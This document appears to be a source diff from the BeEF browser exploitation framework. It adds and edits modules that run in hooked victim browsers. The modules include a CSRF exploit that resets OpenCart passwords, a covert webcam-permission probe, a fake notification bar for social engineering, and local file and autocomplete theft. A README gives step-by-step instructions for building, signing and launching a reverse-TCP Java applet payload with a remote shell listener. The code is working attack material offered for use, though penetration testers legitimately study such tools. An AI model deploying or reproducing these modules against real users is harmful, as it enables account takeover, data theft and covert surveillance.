+    
+});
+
+
+
+
+

modules/browser/webcam_permission_check/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_permission_check:
+            enable: true
+            category: "Browser"
+            name: "Webcam Permission Check"
+            description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
+            authors: ["@bw_z"]
+            target:
+                 working: ["All"]

modules/browser/webcam_permission_check/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Webcam_permission_check < BeEF::Core::Command
+  def pre_send
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
+  end
+  
+  def post_execute 
+
+  	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+  end
+
+end

modules/debug/test_beef_debug/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	try {
+		var msg = "<%= @msg.gsub(/"/, '\\"') %>";
+		beef.debug(msg);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
+	}
+
+});

modules/debug/test_beef_debug/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_beef_debug:
+            enable: true
+            category: "Debug"
+            name: "Test beef.debug()"
+            description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
+            authors: ["bcoles"]
+            target:
+                 working: ["All"]
+                 not_working: ["IE"]

modules/debug/test_beef_debug/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_beef_debug < BeEF::Core::Command
+
+  def self.options
+    return [
+          {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end

modules/debug/test_return_image/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_return_image:
+            enable: true
+            category: "Debug"
+            name: "Return Image"
+            description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/debug/test_return_image/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_return_image < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['image'] = @datastore['image']
+    save content
+  end
+
+end

modules/exploits/beefbind/beef_bind_shell/command.js

@@ -31,15 +31,15 @@ beef.execute(function () {
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
                 var result = strip_output(xhr.responseText);
-                console.log("result.length: " + result.length);
+                beef.debug("result.length: " + result.length);
                 if(result.length != 0){
-                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
                     beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
                         counter++;
                         setTimeout("get_additional_cmd_results()",500);
                         }
              }else{ // No more command results, ready to send another command.
-                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
             }
         };
         xhr.open("GET", uri, false);
@@ -51,9 +51,9 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
-                console.log("get_prompt: Retrieved prompt");
+                beef.debug("get_prompt: Retrieved prompt");
                 var prompt = strip_output(xhr.responseText);
-                console.log(prompt);
+                beef.debug(prompt);
                 beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
 
                 //send command
@@ -68,7 +68,7 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             var cmd_result = strip_output(xhr.responseText);
-            console.log(cmd_result);
+            beef.debug(cmd_result);
             beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
         };
         xhr.open("POST", uri, false);

modules/exploits/beefbind/beef_bind_staged_deploy/command.js

@@ -295,7 +295,7 @@ beef.execute(function () {
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
             log("send_stager: stager sent.");
             stager_successfull = true;
         }catch(exception){
-            console.log("!!! Exception: " + exception);
+            beef.debug("!!! Exception: " + exception);
             // Check for PortBanning exceptions:
             //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
             if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
             var uri = "http://" + rhost + ":" + rport + path;
 
             xhr = new XMLHttpRequest();
-            console.log("uri: " + uri);
+            beef.debug("uri: " + uri);
             xhr.open("POST", uri, true);
             xhr.setRequestHeader("Content-Type", "text/plain");
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
 
     log = function(data){
         beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
-        console.log(data);
+        beef.debug(data);
     };
 
 

modules/exploits/local_host/java_payload/README.txt

@@ -0,0 +1,50 @@
+--- How to use this module ---
+The following is how you compile the JavaPayload handlers :
+
+$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
+$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
+$cd .. && ant compile && ant jar
+$cd build/bin
+$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
+
+At this point you have the applet ready to go, with a reverseTCP handler:
+Applet_ReverseTCP.jar
+Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
+with Java 6 to run it on those versions too - SUGGESTED :-).
+
+At this stage you need to sign the applet.
+The following is to create a self-signed certificate and then sign it.
+Obviously if you have a valid code signing certificate, even better ;)
+
+keytool -keystore tmp -genkey
+jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
+
+Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
+
+You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
+java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+
+Now launch the BeEF module.
+If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
+antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+! help
+help: show information about commands.
+  Usage: help [command]
+
+Supported commands:
+    help   - show this help
+    info   - list system properties
+    pwd    - show current directory
+    cd     - change directory
+    ls     - list directory
+    exec   - execute native command
+    cat    - show text file
+    wget   - download file
+    telnet - create TCP connection
+    paste  - create text file
+    jobs   - list or continue jobs
+    exit   - Exit JSh
+
+When inside an interactive command, enter ~. on a new
+line to exit from that command. Enter ~& to background the command.
+Enter ~~ to start a line with a ~ character

modules/exploits/local_host/java_payload/config.yaml

@@ -12,5 +12,4 @@ beef:
             description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
             authors: ["antisnatchor"]
             target:
-                not_working: ["FF"]
                 user_notify: ["All"]

modules/exploits/local_host/java_payload/module.rb

@@ -6,7 +6,7 @@
 class Java_payload < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
   end
 
   def self.options

modules/exploits/opencart_reset_password/command.js

@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base     = '<%= @base %>'; 
+  var password = '<%= @password %>';
+
+  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+    {'type':'hidden', 'name':'password', 'value':password},
+    {'type':'hidden', 'name':'confirm',  'value':password}
+  ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(opencart_reset_password_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/opencart_reset_password/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        opencart_reset_password:
+            enable: true
+            category: "Exploits"
+            name: "Opencart Reset Password CSRF"
+            description: "Attempts to reset an Opencart user's password."
+            authors: ["Saadat Ullah", "bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/opencart_reset_password/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# This module has not been tested
+class Opencart_reset_password < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/misc/local_file_theft/command.js

@@ -219,9 +219,9 @@ result = '';
     function grabFiles(dir,os){
 	    tmpfile = {}
 	    for (i in fileList[os]['post']){
-            console.log('dir = ' + dir);
-            console.log('fileList: ' + fileList[os]['post'][i]);
-		    console.log(i);
+            beef.debug('dir = ' + dir);
+            beef.debug('fileList: ' + fileList[os]['post'][i]);
+		    beef.debug(i);
 		    tmpfile[i] = new XMLHttpRequest()
 		    tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
 		    tmpfile[i].send();
@@ -229,7 +229,7 @@ result = '';
 		    tmpfile[i].onreadystatechange=function(){
                 for (j in fileList[os]['post']){
 			        if(tmpfile[j].readyState==4){
-                        console.log('new returned for: ' + j);
+                        beef.debug('new returned for: ' + j);
                         result = j +": "+ tmpfile[j].responseText;
                         
                         beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);

modules/network/detect_tor/command.js

@@ -14,7 +14,9 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
+	//img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
+	//img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg'
+	img.src = '<%= @tor_resource %>';
 	img.id = 'torimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {

modules/network/detect_tor/module.rb

@@ -7,6 +7,7 @@ class Detect_tor < BeEF::Core::Command
   
   def self.options
     return [
+    	{'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'},
         {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
     ]
   end

modules/network/internal_network_fingerprinting/command.js

@@ -219,7 +219,7 @@ beef.execute(function() {
 		for(var u=0; u < urls.length; u++) {
 			if(!urls[u][3] && ports != null){ // use default port
 				var img = new Image;
-				//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+				beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
 				img.id  = u;
 				img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
 				img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
 			} else { // iterate to all the specified ports
 				for(p=0;p<ports.length;p++){
 					var img = new Image;
-					//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+					beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
 					img.id  = u;
 					img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
 					img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }

modules/phonegap/phonegap_geo_locate/command.js

@@ -27,7 +27,7 @@ beef.execute(function() {
     // onError Callback receives a PositionError object
     //
     function onError(error) {
-        console.log('code: '    + error.code    + '\n' +
+        beef.debug('code: '    + error.code    + '\n' +
           'message: ' + error.message + '\n');
     }
 

modules/phonegap/phonegap_persistence/command.js

@@ -26,12 +26,12 @@ beef.execute(function() {
     function write_file(text) {
 
         function fail () {
-            console.log('write_file fail')
+            beef.debug('write_file fail')
         }
 
         function gotFileWriter(writer) {
             writer.onwrite = function(evt) {
-                console.log("write success");
+                beef.debug("write success");
             }
             writer.write(text);
         }
@@ -59,14 +59,14 @@ beef.execute(function() {
 
     function read_index(app_name) {
         function fail () {
-            console.log('read_index fail')
+            beef.debug('read_index fail')
         }
         
         function readFile(file) {
             var reader = new FileReader();
             reader.onloadend = function(evt) {
-                //console.log("Read as text");
-                console.log(evt.target.result);
+                //beef.debug("Read as text");
+                beef.debug(evt.target.result);
                 replace_text(evt.target.result);
             };
             reader.readAsText(file);    
@@ -86,14 +86,14 @@ beef.execute(function() {
     function locate() {
  
         function result(entries) {
-         console.log('result'); 
+         beef.debug('result'); 
           var i;
           for (i=0; i<entries.length; i++) {
              // looking for <something>.app
              var re = new RegExp(/^[a-zA-Z0-9]*\.app/)
              var match = re.exec(entries[i].name)
              if (match) {
-               console.log('found ' + entries[i].name);
+               beef.debug('found ' + entries[i].name);
                
                // look for ../<something>.app/www/index.html
                read_index(entries[i].name);
@@ -107,11 +107,11 @@ beef.execute(function() {
 
      
       function fail() {
-        console.log('fail');
+        beef.debug('fail');
       }
 
       function win(entries) {
-        console.log('win');
+        beef.debug('win');
         result(entries);
       }
 

modules/social_engineering/autocomplete_theft/command.js

@@ -44,7 +44,7 @@ beef.execute(function() {
 			var val = JSON.stringify({'input':n,'value':v});
 			if (v != "" && !inArray(val,results)){
 				results.push(val);
-				//console.log(val);
+				beef.debug("[Module - autocomplete_theft] Found saved string: '" + val + "'");
 				beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
 			}
 		}

modules/social_engineering/clippy/command.js

@@ -281,7 +281,7 @@ Clippy.prototype.findHomeBase = function(selector) {
 		div.style.width = "300px";
 		div.style.height = "300px";
 		div.style.backgroundColor = "transparent";
-		div.style.position = "absolute";
+		div.style.position = "fixed";
 		div.style.bottom = "0";
 		div.style.right = "0";
 		
@@ -291,7 +291,7 @@ Clippy.prototype.findHomeBase = function(selector) {
 	
 	}
 	
-	console.log(ref);
+	beef.debug(ref);
 	
 	return ref;
 }

modules/social_engineering/fake_notification/command.js

@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var id = beef.dom.generateID();
+	var pid = beef.dom.generateID();
+	var zztop = beef.dom.getHighestZindex()+1;
+	var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:2px 20px 5px 24px; z-index:'+zztop+'; border-bottom:1px solid black; background:#ffffda; display:none; font-family: \'Tahoma\',sans-serif; font-size: 12px; '});
+	var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+	var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+	var elp = beef.dom.createElement('p',{'id':pid,'style':'padding: 0; margin: 0 50px 0 4px;'});
+	$j('body').append(el);
+	var hid = '#'+id;
+	var hpid = '#'+pid;
+	$j(hid).append(elp);
+	$j(hpid).html('<%= @notification_text %>');
+	$j(hid).append(ell);
+	$j(hid).append(elr);
+	$j(hid).click(function() {
+		$j(this).slideUp(300,function() {
+			$j(this).remove();
+		});
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+	});
+	$j(hid).css('cursor','pointer');
+	$j(hid).slideDown(300,function() {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+	});
+
+});

modules/social_engineering/fake_notification/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification"
